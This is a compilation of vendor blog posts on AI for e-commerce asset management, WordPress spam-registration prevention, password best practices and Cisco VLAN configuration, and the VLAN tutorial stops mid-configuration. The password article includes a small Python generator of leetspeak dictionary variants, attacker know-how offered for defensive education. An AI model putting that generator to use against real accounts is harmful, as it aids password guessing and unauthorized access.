How AI and Automation Help E-Commerce Scale

WRITTEN BY THE CLOUDINARY TEAM FEB-07-2023 7 MIN READ

Post-pandemic, consumer reliance on online shopping remains steady, meaning e-commerce businesses need to continue to adopt new technologies to scale their business operations. 

Digital Asset Management (DAM) software can make it easier for creators to store, search, and organize their assets. Unfortunately, legacy DAM solutions are no longer sufficient to manage large volumes of product-related content. After all, using ‘old school’ DAM software requires a large staff who can manually optimize media and customize experiences for their audience—a practice that goes against agile methodology.

Staying competitive in today’s e-commerce environment requires brands to harness the power of AI and the efficiency of automation. A business using AI can quickly match audiences to relevant products and edit assets on the fly, creating more convenient and personalized shopping experiences. On the back-end, automation simplifies asset management, saving time and resources while increasing sales efficiency and marketing effectiveness.

Harnessing New Technology to Grow E-commerce

During the pandemic, the US saw a 50% increase in e-commerce sales. This rapid shift to online shopping forced many businesses to find new asset management solutions. The right tool saves time for creative teams by taking on the labor involved in cropping, tagging, recoloring, background removal, and numerous other tedious tasks. AI tools can also automate higher-level functions, performing object recognition and asset categorization and efficiently organizing even legacy datasets.

Together, these tools free up a marketing team to address more strategic concerns, like finding opportunities to generate interest across new sales channels and touchpoints. 

E-commerce activity generates a lot of data that can be used for discovery. However, creators and developers can’t use what they can’t access, and studies show that 73% of data is never used for analytics. This wasted data is more than just lost revenue: Storing and transmitting data is expensive and also poses environmental concerns. To optimize asset delivery and extract the most valuable data from e-commerce activity, businesses must enhance their DAM tools with AI and automation.

AI and Automation for Scaling

Let’s look at how AI and automation can help an e-commerce business achieve greater customer satisfaction, higher revenue, lower costs, happier employees, and more efficient and agile business operations.

Marketing

Many websites use cookies to track their customers’ buying patterns and enable personalized product recommendations. AI can analyze this information, letting us automate outreach and customize campaigns and newsletters.

Effective tools provide extensible APIs to automate DAM and target specific user segments and devices. For example, Cloudinary’s Admin API lets you retrieve and manipulate asset metadata as part of an automated pipeline. In conjunction with Cloudinary’s object detection tools, it’s a powerful way to modernize legacy databases.
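
As a rough illustration of what such a pipeline might look like with Cloudinary’s Python SDK (a minimal sketch, not Cloudinary’s official sample code; the folder name, tag, and credentials are hypothetical):

import cloudinary
import cloudinary.api

# Hypothetical credentials; use your own cloud name and API keys
cloudinary.config(cloud_name="demo", api_key="KEY", api_secret="SECRET")

# List up to 100 uploaded assets under a hypothetical "products/" folder
resources = cloudinary.api.resources(type="upload", prefix="products/", max_results=100)

# Tag each asset as part of an automated pipeline
for asset in resources["resources"]:
    cloudinary.api.update(asset["public_id"], tags=["fall-catalog"])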

Product

Most companies offer flexible return policies to stay competitive in a market where customers cannot appraise a product in person before purchase. It’s expensive to provide the customer with this freedom—product returns cost companies millions of dollars annually. 

One of the most common reasons customers return products is because they feel they’ve received something different than what they saw before purchase, which could occur if the product page had insufficient photos or poor-quality images. For an e-commerce retailer, saving money by taking fewer photos is a false economy; a loss of revenue and the cost of processing returns can offset any savings.

AI-powered content creation helps ensure customers are happy with their purchases. Cloudinary’s image and video transformation API, for example, provides a suite of tools to generate high-quality derivative assets from a small number of product images. Suppose you’re selling a sweater in a range of colors: the image transformation API can recolor a single photo, so the product team only needs to photograph the sweater once.
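
As a minimal sketch with the Python SDK (assuming a public ID of "sweater" and the e_replace_color effect; the color and tolerance values are illustrative):

import cloudinary
from cloudinary import CloudinaryImage

cloudinary.config(cloud_name="demo")  # hypothetical cloud name

# Build a derivative URL that recolors the sweater photo to maroon;
# 80 is the tolerance for how closely pixels must match the original color
url = CloudinaryImage("sweater").build_url(effect="replace_color:maroon:80")
print(url)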

AI is also a powerful tool for matching visitors to the products they’re most likely to buy. By combining in-session user behavior patterns with cookies, an AI-based system can recommend appropriately sized clothing that matches the customer’s style.

Then, when a potential buyer is matched to a product, we can use AI-powered tools to generate interest. For example, on Mazda’s purchase page, customers can apply 3D model transformation functions to create a 360-degree view of their vehicle build with all the personalized upgrade options and the color they’ve selected.

AI also enables customers to preview personalized products. If a clothing retailer offers the option to add a custom inscription or design, for example, then an AI-powered displacement map can show what the final product will look like much more clearly than a simple overlay.

We can implement much of this functionality with a tool like Cloudinary’s content-aware object detection add-on. When used alongside the AI-powered background removal tool, we can generate and edit image assets for any context. For instance, consider an automotive manufacturer with a database of automotive add-ons. An AI could analyze image assets and apply smart tags to categorize product options. If the manufacturer offers numerous upgrade options across a range of a dozen or more vehicles, this will save a lot of time and work. The technology can even help with cleaning up legacy databases and regaining control over lost or mislabeled assets.
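
Here’s a rough sketch of what automated tagging might look like with the Python SDK, using the Google auto-tagging add-on as a stand-in for whichever detection add-on is enabled on the account (the file path and confidence threshold are illustrative):

import cloudinary
import cloudinary.uploader

cloudinary.config(cloud_name="demo", api_key="KEY", api_secret="SECRET")  # hypothetical

# Upload a product image and request automatic categorization;
# labels detected with at least 70% confidence are applied as tags
result = cloudinary.uploader.upload(
    "images/roof-rack.jpg",           # hypothetical local file
    categorization="google_tagging",  # requires the add-on to be enabled
    auto_tagging=0.7,
)
print(result.get("tags"))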

Customer Service

A well-organized asset database also creates happier customers. If visitors to our storefront have access to a search field or chatbot for queries, we can combine that data with the user behavior data we collected earlier and compare it against our meticulously (and automatically) tagged and organized product catalog.

As we integrate AI tools more deeply into our supply chain, we can also expect more efficient fulfillment as we optimize for customer preference, location, and even local weather. For example, we can integrate Cloudinary-managed assets with Next.js Middleware in Netlify to find out where visitors are located and inject shipping information. If customers find the status updates useful, they’re more likely to become repeat buyers.

AI also helps build customer trust. AI-powered tools can automatically synchronize sales across multiple devices, identify high-risk transactions, and offer discounts to loyal customers more intelligently than rule-based implementations would. We can even use virtual assistants to handle administrative tasks that impact the end-user experience. 

For example, AI can help a storefront become more responsive by determining which media assets should be cached locally in a Content Delivery Network (CDN) or by identifying the most routine customer queries and offloading them to automated chatbots. An apparel storefront can provide a more bespoke experience by offering AI-powered fit and sizing assistance or even suggestions for complementary wardrobe choices.

When a customer decides to purchase, AI can help us ensure we’ve minimized human error in the inventory handling and fulfillment stages. If our product has a loyal following, we can keep customers engaged by providing AI-optimized, up-to-date stock arrival notifications.

If we allow end users to create their own content, such as photos in product reviews (or if we’re using AI to pull from external content stores), we should use a tool like Cloudinary’s asset moderation. Depending on the type and volume of content, we can configure these add-ons to flag content for manual or automatic review or a combination of both. For instance, we might want to automatically reject some content, such as low-quality images or images that have not been anonymized. Other content might need human approval, such as automatically smart-tagged product images. 
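
A minimal sketch of queuing an upload for moderation with the Python SDK might look like this (the moderation mode and file name are illustrative, and the exact response fields may vary):

import cloudinary
import cloudinary.uploader

cloudinary.config(cloud_name="demo", api_key="KEY", api_secret="SECRET")  # hypothetical

# Send a user-submitted review photo to the manual moderation queue
result = cloudinary.uploader.upload("review-photo.jpg", moderation="manual")

# The asset stays pending until a moderator approves or rejects it
print(result["moderation"][0]["status"])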

Sales

To be competitive in sales within a digital ecosystem, you often need to analyze trends in external data. AI tools help us stay competitive with comprehensive industry monitoring and analysis. Rather than manually searching for a competitive edge, we can feed raw data into our models and expect better insights—notably, often without needing to perform the tedious process of data normalization.

Another common necessity of e-commerce businesses—namely, complex integrations—can break continuity between upstream and downstream portions of the sales pipeline, especially when integrating legacy applications. This process can create extra work and delays for the sales team, who either have to troubleshoot integrations or rely on support teams or developer teams to make changes. AI-powered automation can solve this issue and create a more extensible and easy-to-use pipeline for the sales team.

Financial Processing

In an e-commerce business, payroll, accounting, and invoicing are all digital (and often cloud-first) processes. This makes them ideally suited to administrative automation and AI.

Cloudinary’s broad set of integrations enables Cloudinary-managed assets to be deployed through commercial platforms, like Adobe Commerce (formerly Magento) or Salesforce. We get the benefits of the financial tooling of top e-commerce and marketing frameworks while delivering quality, relevant content that’s been automatically curated by asset management technologies.

Ride the E-Commerce Wave

To grow an e-commerce business in a cloud-first world, you need the help of cutting-edge technologies. In the DAM space, AI can make the difference between a digital storefront that needs constant manual labor to stay effective and an e-commerce business that’s ready to sail the tide of internet commerce. To start integrating AI into your business plan, visit Cloudinary today.

Source :
https://cloudinary.com/blog/how-ai-and-automation-help-e-commerce-scale

Prevent spam user registration in WordPress: 2024 guide

JANUARY 20, 2024 BY PAUL G.

Spam registrations are common on WordPress websites. WordPress is the most popular content management system in the world, with over 60 percent market share. This makes it a prime target for scammers. It’s also, unfortunately, easy to create fake user accounts on the platform, requiring only an account name, email address, and password – all things spammers can simply invent. 

Fake registrations can cause extensive issues, such as hogging resources, spreading malware, and creating an unmanageable user base. 

WordPress doesn’t have default functionality to combat spam user registrations, but the good news is that plugins like Shield Security PRO can fill the gap. Let’s take a look at some strategies for preventing spam user registrations.

Introduction to spam registrations in WordPress 

WordPress spam registrations occur when spammers create accounts on sites without any intention of using them for authentic purposes. Typically, spammers use automated programs, or bots, to create these accounts. Spammers may also use bots and spam accounts for phishing, trying to acquire sensitive information from users and webmasters to compromise their security.

Website owners often underestimate the harm spam registrations can cause. These range from immediate annoyances to long-term security problems and data distortion. 

For example, spam registrations can clog your inbox, causing surges of email notifications informing you of fake sign-ups for your website. Processing and deleting these emails and accounts without getting rid of legitimate users is time-consuming and challenging. 

Spam registrations can also overload server resources, affecting performance. Spam bots can make frequent login attempts, using up your bandwidth and making your website run slower for legitimate users. 

There can also be some considerable long-term consequences. Users may tire of spam comments and stop interacting with your content. You may also struggle to analyse user data, distorting your view of how your site is functioning. This can lead to security vulnerabilities and damage your site’s SEO. 

Strategies to prevent WordPress user registration spam 

This section covers various strategies and techniques that you can implement to prevent new user registration spam and improve the overall security of your WordPress site.

Install a WordPress security plugin

The first strategy is to install a WordPress security plugin. Choosing the right security plugin not only helps prevent spam registrations on your WordPress site, but it also gives you access to a wide range of security features.

Shield Security PRO is the best plugin for improving the overall security of your WordPress site. The plugin’s key features include bad bot detection and blocking, invisible CAPTCHA codes, human and bot spam prevention, traffic rate limiting, and malware scanning. 

Together, these features detect and block bad bots before they can create spam accounts, protecting your site around the clock.

Disable WordPress registration

Using a plugin like ShieldPRO is the best choice to ensure the ongoing security of your WordPress site. However, there are also manual methods you can employ to help prevent user registration spam.

Disabling user registration in WordPress is one strategy. This approach eliminates the problem of spam signups entirely. You could try this option if you don’t need to collect user information, run a website with limited resources, or simply want to provide audiences with information for free.

The steps to disable registration on your WordPress site are as follows: 

  1. From the WordPress dashboard, go to Settings > General.
  2. Next, go to “Membership” and uncheck the “Anyone can register” box.

It’s worth considering that this technique prevents you from collecting visitor details, which stops you from building email lists or marketing directly to your audience. It also reduces personalisation opportunities and limits community building. 

Add CAPTCHA to your user registration form

You can also try adding CAPTCHA to your user registration form. This prevents automated spam registrations by identifying bots before they can create accounts. 

Various forms of CAPTCHA plugins for your site exist, including: 

  • reCAPTCHA: Google reCAPTCHA is a free service that combines text and images in a user-friendly interface, designed to weed out bots.
  • hCAPTCHA: hCAPTCHA is a free service that uses images and action-based tests to identify bots. This service is customisable and prioritises user privacy. 

ShieldPRO’s AntiBot Detection Engine (ADE) avoids the need to use CAPTCHA at all. Since the plugin automatically detects and blocks bots, there’s no reason to test your visitors for signs of nuts and bolts. 

Implement geoblocking

You can also try geoblocking, a security method that limits website access to specific regions. It works by filtering IP addresses by location, only letting specific IPs enter the site. 

Geoblocking prevents spam from regions known for high levels of malicious activity. However, it also comes with drawbacks. For example, it can cause false positives, blocking legitimate site users simply because they are in the wrong country. Spammers can also bypass it with proxy servers and VPNs.

Fortunately, ShieldPRO’s automated IP blocking technology more accurately and effectively stops spam users by blocking them after a specified number of offences. It detects malicious activity regardless of the traffic’s origin. 

Require manual approval for user registration

Manual user approvals can also mitigate spam registrations, offering significant benefits. The approach drastically reduces the chances of bot sign-up while also permitting you to collect legitimate user details. 

Drawbacks include the time-intensive nature of this method and the lack of scalability for larger WordPress sites. You may need to hire multiple full-time operatives to manage website administration, which can get pricey, fast.

Turn on email activation for user registration

Email activation for user registration is another popular technique to guard against spam registrations. It works by getting users to click a link in their email account to verify their details. 

Shield Security PRO includes a built-in email-checking feature. This tests whether the email has a valid structure and is registered to a legitimate domain. It also checks whether there are any mail exchange (MX) records for the domain, and determines whether the email address belongs to a disposable domain. These checks help flag fake and temporary email addresses in user registrations.
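
To illustrate the idea, here is a rough Python sketch of the same kinds of checks. This is not the plugin’s actual code; it uses the dnspython package, and the disposable-domain list is made up:

import re
import dns.resolver
import dns.exception  # pip install dnspython

DISPOSABLE_DOMAINS = {"mailinator.com", "10minutemail.com"}  # illustrative list

def looks_legitimate(email):
    # 1. Does the address have a valid structure?
    if not re.fullmatch(r"[^@\s]+@[^@\s]+\.[A-Za-z]{2,}", email):
        return False
    domain = email.rsplit("@", 1)[1].lower()
    # 2. Is it a known disposable domain?
    if domain in DISPOSABLE_DOMAINS:
        return False
    # 3. Does the domain have mail exchange (MX) records?
    try:
        dns.resolver.resolve(domain, "MX")
        return True
    except dns.exception.DNSException:
        return False

print(looks_legitimate("user@example.com"))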

Block spam IP addresses

One of the primary ways Shield Security PRO works is by blocking malicious IP addresses once they’ve behaved badly enough to qualify as bots. No single action by an IP address on your site proves it’s a bot. However, certain patterns of behaviour give bots away clear as day.

“When you look at the activity as a whole,” says Paul Goodchild, creator of Shield Security PRO, “a bot’s activity on a site is clearly distinguishable from human users.”

The plugin then uses this clear indication as a signal to block the IP address entirely, stopping malicious activity in its tracks. The plugin also uses CrowdSec technology to minimise the risk of false positives and enable as many legitimate sign-ups as possible. 

Secure your WordPress site with ShieldPRO today 

The damaging impact of spam user registrations can be substantial. It can cause clogged inboxes, distorted user analytics, and server overload. The long-term consequences are diminished website SEO, reputational damage, and security vulnerabilities due to phishing and malware. 

Fortunately, there are various methods to prevent spam user registrations on WordPress websites. The most effective option is to use a plugin like Shield Security PRO. This plugin keeps malicious bots off your website, and since most spam user registrations come from bots, you can rest a lot easier.

Try ShieldPRO on your WordPress site today with a 14-day money-back guarantee. Install it to maximise your WordPress security and get some well-earned peace of mind.

Source :
https://getshieldsecurity.com/blog/stop-spam-registrations-wordpress/

The Ultimate Guide to Password Best Practices: Guarding Your Digital Identity

Dirk Schrader
Published: November 14, 2023
Updated: November 24, 2023

In the wake of escalating cyber-attacks and data breaches, the ubiquitous advice of “don’t share your password” is no longer enough. Passwords remain the primary keys to our most important digital assets, so following password security best practices is more critical than ever. Whether you’re securing email, networks, or individual user accounts, following password best practices can help protect your sensitive information from cyber threats.

Read this guide to explore password best practices that should be implemented in every organization — and learn how to protect vulnerable information while adhering to better security strategies.

The Secrets of Strong Passwords

A strong password is your first line of defense when it comes to protecting your accounts and networks. Implement these standard password creation best practices when thinking about a new password:

  • Complexity: Ensure your passwords contain a mix of uppercase and lowercase letters, numbers, and special characters. Note that NIST no longer recommends composition rules (required symbols, mixed case, and so on), so use them at your own discretion.
  • Length: Longer passwords are generally stronger, and length usually trumps complexity. Aim for at least eight characters, and preferably 12 or more.
  • Unpredictability: Avoid common phrases, patterns, and easily guessable information like birthdays or names. Instead, create unique strings that are difficult for hackers to guess.

Combining these factors makes passwords harder to guess. For instance, if a password is 8 characters long and includes uppercase letters, lowercase letters, numbers and special characters, the total possible combinations would be (26 + 26 + 10 + 30)^8. This astronomical number of possibilities makes it exceedingly difficult for an attacker to guess the password.
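
You can verify that figure with a couple of lines of Python (assuming a pool of 30 special characters, as above):

# upper + lower + digits + 30 special characters
pool = 26 + 26 + 10 + 30
print(pool ** 8)   # 5132188731375616 possible 8-character passwords
print(pool ** 12)  # every extra character multiplies the search space by 92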

Of course, given NIST’s updated guidance on passwords, the best approach to effective password security is using a password manager — this solution will not only help create and store your passwords, but it will automatically reject common, easy-to-guess passwords (those included in password dumps). Password managers greatly increase security against the following attack types.

Password-Guessing Attacks

Understanding the techniques that adversaries use to guess user passwords is essential for password security. Here are some of the key attacks to know about:

Brute-Force Attack

In a brute-force attack, an attacker systematically tries every possible combination of characters until the correct password is found. This method is time-consuming but can be effective if the password is weak.

Strong passwords help thwart brute force attacks because they increase the number of possible combinations an attacker must try, making it unlikely they can guess the password within a reasonable timeframe.

Dictionary Attack

A dictionary attack is a type of brute-force attack in which an adversary uses a list of common words, phrases and commonly used passwords to try to gain access.

Unique passwords are essential to thwarting dictionary attacks because attackers rely on common words and phrases. Using a password that isn’t a dictionary word or a known pattern significantly reduces the likelihood of being guessed. For example, the string “Xc78dW34aa12!” is not in the dictionary or on the list of commonly used passwords, making it much more secure than something generic like “password.”

Dictionary Attack with Character Variations

In some dictionary attacks, adversaries use standard dictionary words but also try common character substitutions, such as replacing ‘a’ with ‘@’ or ‘e’ with ‘3’. For example, in addition to trying to log on with the word “password”, they might also try the variant “p@ssw0rd”.
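
A toy Python sketch shows how cheaply an attacker can generate these variants for every word in a list (the substitution table is illustrative):

# Common "leet" substitutions an attacker might try
SUBS = {"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"}

def leet_variants(word):
    variants = {word}
    for plain, sub in SUBS.items():
        # Add a copy of every existing variant with this substitution applied
        variants |= {v.replace(plain, sub) for v in variants}
    return variants

print(sorted(leet_variants("password")))  # includes 'p@ssw0rd'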

Choosing complex and unpredictable passwords is necessary to thwart these attacks. By using unique combinations and avoiding easily guessable patterns, you make it challenging for attackers to guess your password.

How Password Managers Enhance Security

Password managers are indispensable for securely storing and organizing your passwords. These tools offer several key benefits:

  • Security: Password managers store passwords and enter them for you, eliminating the need for users to remember them all. All users need to remember is the master password for their password manager tool. Therefore, users can use long, complex passwords as recommended by best practices without worrying about forgetting their passwords or resorting to insecure practices like writing passwords down or reusing the same password for multiple sites or applications.
  • Password generation: Password managers can generate a strong and unique password for user accounts, eliminating the need for individuals to come up with them.
  • Encryption: Password managers encrypt password vaults, ensuring the safety of data — even if it is compromised.
  • Convenience: Password managers enable users to easily access passwords across multiple devices.

When selecting a password manager, it’s important to consider your organization’s specific needs, such as support for the platforms you use, price, ease of use and vendor breach history. Conduct research and read reviews to identify the one that best aligns with your organization’s requirements. Some noteworthy options include Netwrix Password Secure, LastPass, Dashlane, 1Password and Bitwarden.

How Multifactor Authentication (MFA) Adds an Extra Layer of Security

Multifactor authentication strengthens security by requiring two or more forms of verification before granting access. Specifically, you need to provide at least two of the following authentication factors:

  • Something you know: The classic example is your password.
  • Something you have: Usually this is a physical device like a smartphone or security token.
  • Something you are: This is biometric data like a fingerprint or facial recognition.

MFA renders a stolen password worthless, so implement it wherever possible.

Password Expiration Management

Password expiration policies play a crucial role in maintaining strong password security, and using a password manager that creates strong passwords influences how often passwords need to change. If you do not use a password manager yet, implement a strategy to check all passwords within your organization; with the rise in data breaches, the password lists (like the well-known rockyou.txt and its variants) used in brute-force attacks are constantly growing. The website haveibeenpwned.com offers a service to check whether a certain password has been exposed (see the sketch after this list). Here’s what users should know about password security best practices related to password expiration:

  • Follow policy guidelines: Adhere to your organization’s password expiration policy. This includes changing your password when prompted and selecting a new, strong password that meets the policy’s requirements.
  • Set reminders: If your organization doesn’t enforce password expiration via notifications, set your own reminders to change your password when it’s due. Regularly check your email or system notifications for prompts.
  • Avoid obvious patterns: When changing your password, refrain from using variations of the previous one or predictable patterns like “Password1,” “Password2” and so on.
  • Report suspicious activity: If you notice any suspicious account activity or unauthorized password change requests, report them immediately to your organization’s IT support service or helpdesk.
  • Be cautious with password reset emails: Best practice for good password security means being aware of scams. If you receive an unexpected email prompting you to reset your password, verify its authenticity. Phishing emails often impersonate legitimate organizations to steal your login credentials.
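
Here is the exposure check mentioned above as a short Python sketch against the haveibeenpwned.com Pwned Passwords API. The API uses k-anonymity, so only the first five characters of the password’s SHA-1 hash ever leave your machine (requires the requests package):

import hashlib
import requests

def times_pwned(password):
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    # Only the 5-character hash prefix is sent to the API
    resp = requests.get("https://api.pwnedpasswords.com/range/" + prefix, timeout=10)
    resp.raise_for_status()
    for line in resp.text.splitlines():
        candidate, _, count = line.partition(":")
        if candidate == suffix:
            return int(count)  # number of known breaches containing this password
    return 0

print(times_pwned("password"))  # a very large number; 0 means no known exposure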

Password Security and Compliance

Compliance standards require password security and password management best practices as a means to safeguard data, maintain privacy and prevent unauthorized access. Here are a few of the laws that require password security:

  • HIPAA (Health Insurance Portability and Accountability Act): HIPAA mandates that healthcare organizations implement safeguards to protect electronic protected health information (ePHI), which includes secure password practices.
  • PCI DSS (Payment Card Industry Data Security Standard): PCI DSS requires organizations that handle payment card data on their website to implement strong access controls, including password security, to protect cardholder data.
  • GDPR (General Data Protection Regulation): GDPR requires organizations that store or process the data of EU residents to implement appropriate security measures to protect personal data. Password security is a fundamental aspect of data protection under GDPR.
  • FERPA (Family Educational Rights and Privacy Act): FERPA governs the privacy of student education records. It includes requirements for securing access to these records, which involves password security.

Organizations subject to these compliance standards need to implement robust password policies and password security best practices. Failure to do so can result in steep fines and other penalties.

There are also voluntary frameworks that help organizations establish strong password policies. Two of the most well known are the following:

  • NIST Cybersecurity Framework: The National Institute of Standards and Technology (NIST) provides guidelines and recommendations, including password best practices, to enhance cybersecurity.
  • ISO 27001: ISO 27001 is an international standard for information security management systems (ISMSs). It includes requirements related to password management as part of its broader security framework.

Password Best Practices in Action

Now, let’s put these password security best practices into action with an example:

Suppose your name is John Doe and your birthday is December 10, 1985. Instead of using “JohnDoe121085” as your password (which is easily guessable), follow these good password practices:

  • Create a long, unique (and unguessable) password that borrows nothing from your name or birthday, such as: “T7#kPz!9qLmW”
  • Store it in a trusted password manager.
  • Enable multi-factor authentication whenever available.

10 Password Best Practices

If you are looking to strengthen your security, follow these password best practices:

  • Remove hints or knowledge-based authentication: NIST recommends not using knowledge-based authentication (KBA), such as questions like “What town were you born in?” but instead, using something more secure, like two-factor authentication.
  • Encrypt passwords: Protect passwords with encryption both when they are stored and when they are transmitted over networks. This makes them useless to any hacker who manages to steal them.
  • Avoid clear text and reversible forms: Users and applications should never store passwords in clear text or any form that could easily be transformed into clear text. Ensure your password management routine does not use clear text (like in an XLS file).
  • Choose unique passwords for different accounts: Don’t reuse the same password, or even variations of it, across accounts. Come up with a unique password for each account.
  • Use a password manager: This can help select new passwords that meet security requirements, send reminders of upcoming password expiration, and help update passwords through a user-friendly interface.
  • Enforce strong password policies: Implement and enforce strong password policies that include minimum length and complexity requirements, along with a password history rule to prevent the reuse of previous passwords.
  • Update passwords when needed: Check your passwords regularly and update them whenever the results indicate a compromise, especially after data breaches. This minimizes the risk of unauthorized access.
  • Monitor for suspicious activity: Continuously monitor your accounts for suspicious activity, including multiple failed login attempts, and implement account lockouts and alerts to mitigate threats.
  • Educate users: Conduct or partake in regular security awareness training to learn about password best practices, phishing threats, and the importance of maintaining strong, unique passwords for each account.
  • Implement password expiration policies: Enforce password expiration policies that require password changes under defined circumstances to enhance security.

How Netwrix Can Help

Adhering to password best practices is vital to safeguarding sensitive information and preventing unauthorized access.

Netwrix Password Secure provides advanced capabilities for monitoring password policies, detecting and responding to suspicious activity and ensuring compliance with industry regulations. With features such as real-time alerts, comprehensive reporting and a user-friendly interface, it empowers organizations to proactively identify and address password-related risks, enforce strong password policies, and maintain strong security across their IT environment.

Conclusion

In a world where cyber threats are constantly evolving, adhering to password management best practices is essential to safeguard your digital presence. First and foremost, create a strong and unique password for each system or application — remember that using a password manager makes it much easier to adhere to this critical best practice. In addition, implement multifactor authentication whenever possible to thwart any attacker who manages to steal your password. By following the guidelines, you can enjoy a safer online experience and protect your valuable digital assets.

Dirk Schrader

Dirk Schrader is a Resident CISO (EMEA) and VP of Security Research at Netwrix. A 25-year veteran in IT security with certifications as CISSP (ISC²) and CISM (ISACA), he works to advance cyber resilience as a modern approach to tackling cyber threats. Dirk has worked on cybersecurity projects around the globe, starting in technical and support roles at the beginning of his career and then moving into sales, marketing and product management positions at both large multinational corporations and small startups. He has published numerous articles about the need to address change and vulnerability management to achieve cyber resilience.

Source :
https://blog.netwrix.com/2023/11/15/password-best-practices/

How to Set Up a VLAN

Diego Asturias UPDATED: July 11, 2023


If you want to improve your network security and performance, learning how to set up a VLAN properly is a great place to start. Virtual LANs are powerful networking tools that allow you to segment your network into logical groups and isolate traffic between them.

In this post, we will go through the steps required to set up a VLAN in your network. We will configure two switches, their interfaces, and their VLANs.

So, let’s dive in and learn how to set up VLANs and take your network to the next level.

Table of Contents

  • What is a VLAN?
  • Preparing for VLAN configuration
    • Our Lab
    • Network Diagram
  • How to set up a VLAN on a Switch?
    • Let’s connect to the Switch
    • Configure VLANs
    • Assign switch ports to VLANs
    • Configure trunk ports
  • Extra Configuration to Consider

What is a VLAN?

Before we go deep into learning how to set up a VLAN and provide examples, let’s understand the foundations of VLANs (or Virtual Local Area Networks).

In a nutshell, VLANs are logical groupings of devices that rely on Layer 2 (MAC) addresses for communication. VLANs are implemented to segment a physical network (or a large Layer 2 broadcast domain) into multiple smaller logical networks (isolated broadcast domains).

Each VLAN behaves as a separate network with its own broadcast domain. VLANs help prevent broadcast storms (extreme amounts of broadcast traffic). They also help control traffic and overall improve network security and performance.

Preparing for VLAN configuration

Although VLAN configuration is usually left to Layer 2 switches, any device with switching capabilities and support for VLAN configuration (including routers and L3 switches) can do the job. In addition, VLANs are supported by many vendors, and since each vendor has a different OS and command syntax, the way VLANs are configured may vary slightly.

Furthermore, you can use network diagramming and simulation software to help you design the network and test your configuration.

Our Lab

We will configure a popular Cisco (IOS-based) switch for demonstration purposes, using Boson NetSim (a network simulator for Cisco networking hardware and software) to run simulated Cisco IOS commands. The simulation behaves as if you were configuring an actual Cisco switch or router.

Network Diagram

To further illustrate how to set up a VLAN, we will work on the following network diagram. We will configure two VLANs on two different switches, then configure each switch port connected to a PC. Finally, we will configure the trunk port, which is vital for carrying VLAN traffic between switches.

Network diagram details

  • S2 and S3 (Switch 2 and Switch 3) – Two Cisco L2 Switches connecting PCs at different VLANs (VLAN 10 and VLAN 20) via Fast Ethernet interfaces.
  • VLAN 10 and VLAN 20 – These VLANs, configured on the L2 switches (S2 and S3), create a logical grouping of PCs within the network. Each VLAN also gets a name: VLAN 10 (Engineering) and VLAN 20 (Sales).
  • PCs. PC1, PC2, PC3, and PC4 are each connected to a specific L2 switch.

How to set up a VLAN on a Switch?

So now that you know the VLAN configuration we will be using, including the number of switches, VLAN ID, VLAN name, and the devices or ports that will be part of the configuration, let’s start setting up the VLANs.

Note: VLAN configuration is just a piece of the puzzle. Switches also need proper interface configuration, authentication, access, etc. To learn how to correctly connect and configure everything else, follow the step-by-step guide on how to configure a Cisco Switch. 

a. Let’s connect to the switch

Inspect your hardware and find the console port. This port is usually located on the back of your Cisco switch. You can connect to the switch’s “console port” using a console cable (or rollover). Connect one end of the console cable to the switch’s console port and the other to your computer’s serial port.

Note: Obviously, not all modern computers have serial ports. Some modern switches come with a Mini USB port or AUX port to help with this. But if your hardware doesn’t have these ports, you can also connect to the switch port using special cables like an RJ-45 rollover cable, a Serial DB9-to-RJ-45 console cable, or a serial-to-USB adapter. 

  • Depending on your switch’s model, you can configure it via Command Line Interface (CLI) or Graphical User Interface (GUI). We will connect to the most popular user interface: The IOS-based CLI. 
  • To connect to your switch’s IOS-based CLI, you must use a terminal emulator on your computer, such as PuTTY or SecureCRT.
  • You’ll need to configure the terminal emulator to use the correct serial port and set the baud rate to 9600. Learn how to properly set these parameters in the Cisco switching configuration guide.
  • In the terminal emulator, press Enter to activate the console session. The Cisco switch should display a prompt asking for a username and password.
  • Enter your username and password to log in to the switch.
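
If you’d rather script the console session than use a terminal emulator, here’s a minimal Python sketch using the pyserial package (the port name is hypothetical; on Linux it might be /dev/ttyUSB0 instead of COM3):

import serial  # pip install pyserial

# Standard Cisco console settings: 9600 baud, 8 data bits, no parity, 1 stop bit
console = serial.Serial(port="COM3", baudrate=9600, bytesize=8,
                        parity=serial.PARITY_NONE, stopbits=1, timeout=1)
console.write(b"\r\n")                            # wake up the console session
print(console.read(256).decode(errors="ignore"))  # should show the login prompt
console.close()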

b. Configure VLANs

According to our previously shown network diagram, we will need two VLANs; VLAN 10 and VLAN 20.

  • To configure Layer 2 switches, you need to enter the privileged EXEC mode by typing “enable” and entering the password (if necessary).
  • Enter the configuration mode by typing “configure terminal.”
  • Create the VLAN with “vlan <vlan ID>” (e.g., “vlan 10”).
  • Name the VLAN by typing “name <vlan name>” (e.g., “name Sales”).
  • Repeat these two steps for each VLAN you want to create.

Configuration on Switch 2 (S2)

S2# configure terminal

S2(config)# vlan 10

S2(config-vlan)# name Engineering

S2(config-vlan)# end

S2# configure terminal

S2(config)# vlan 20

S2(config-vlan)# name Sales

S2(config-vlan)# end

Use the “show vlan” command to see the configured VLANs. From the output below, you’ll notice that the two new VLANs 10 (Engineering) and 20 (Sales) are indeed configured and active but not yet assigned to any port.

Configuration on Switch 3 (S3)

S3# configure terminal

S3(config)# vlan 10

S3(config-vlan)# name Engineering

S3(config-vlan)# end

S3# configure terminal

S3(config)# vlan 20

S3(config-vlan)# name Sales

S3(config-vlan)# end

Note: From the output above, you might have noticed VLAN 1 (default), which is currently active and is assigned to all the ports in the switch. This VLAN, also known as native VLAN, is the default VLAN on most Cisco switches. It is used for untagged traffic on a trunk port. This means that all traffic that is not explicitly tagged with VLAN information will be sent to this default VLAN. 

Now, let’s remove those VLAN 1 tags from interfaces Fa0/2 and Fa0/3. Or, in simple words, let’s assign those ports to our newly created VLANs.

c. Assign switch ports to VLANs

In the previous section, we created our VLANs; now, we must assign the appropriate switch ports to the correct VLANs. The proper steps to assign switch ports to VLANs are as follows:

  • Enter configuration mode. Remember to run these commands under the configuration mode (configure terminal).
  • Select the port by typing “interface <interface ID>” (e.g., “interface GigabitEthernet0/1”).
  • Configure the port as an access port by typing “switchport mode access”
  • Assign the port to a VLAN by typing “switchport access vlan <vlan ID>” (e.g., “switchport access vlan 10”).
  • Repeat these steps for each port you want to assign to a VLAN.

Let’s refer to a section of our network diagram

Configuration on Switch 2 (S2)

S2(config)# interface fastethernet 0/2

S2(config-if)# switchport mode access

S2(config-if)# switchport access vlan 10

S2(config)# interface fastethernet 0/3

